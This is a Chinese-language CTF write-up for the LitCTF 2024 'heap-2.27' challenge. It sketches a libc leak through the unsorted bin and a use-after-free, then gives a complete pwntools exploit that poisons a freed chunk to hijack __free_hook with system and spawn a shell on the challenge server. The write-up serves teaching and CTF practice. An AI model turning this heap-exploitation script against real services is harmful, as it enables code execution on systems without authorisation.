[LitCTF 2024]heap-2.27
Problem: [LitCTF 2024]heap-2.27
思路
通过unsortbin泄漏libc地址,根据地址找到free_hook函数所在。 delete函数中存在uaf,使得我们能够修改已经释放的堆块,因此,我们可以通过修改堆块的fd申请到任意内存位置的堆块,实现free_hook劫持。 需要了解unsortbin生成条件,free_hook劫持原理。
EXP
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
from pwn import *
context.log_level = 'debug'
context.terminal = ['tmux','splitw','-h']
#elf = ELF('./heap')
lib = ELF('/root/tools/glibc-all-in-one/libs/2.27-3ubuntu1.5_amd64/libc.so.6')
#io = gdb.debug('./heap')
io = remote('node4.anna.nssctf.cn',28014)
def create(idx,size):
io.sendlineafter(b'>>',str(1))
io.sendlineafter(b'idx? ',str(idx))
io.sendlineafter(b'size? ',str(size))
def delete(idx):
io.sendlineafter(b'>>',str(2))
io.sendlineafter(b'idx? ',str(idx))
def show(idx):
io.sendlineafter(b'>>',str(3))
io.sendlineafter(b'idx? ',str(idx))
def edit(idx,content):
io.sendlineafter(b'>>',str(4))
io.sendlineafter(b'idx? ',str(idx))
io.sendlineafter(b'content :',content)
create(0,0x10)
create(1,0x420)
create(2,0x10)
delete(1)
show(1)
free_hook = u64(io.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))+0x1c48
log.info(hex(free_hook))
libc_base = free_hook-lib.sym['__free_hook']
sys_addr = libc_base + lib.sym['system']
#pause()
create(3,0x10)
delete(3)
edit(3,p64(free_hook))
create(4,0x10)
create(5,0x10)
#pause()
edit(5,p64(sys_addr))
edit(4,b'/bin/sh')
delete(4)
io.interactive()
总结
学到一个小技巧,在pwngdb中可以通过p &__free_hook配合distance确定位置。
This post is licensed under CC BY 4.0 by the author.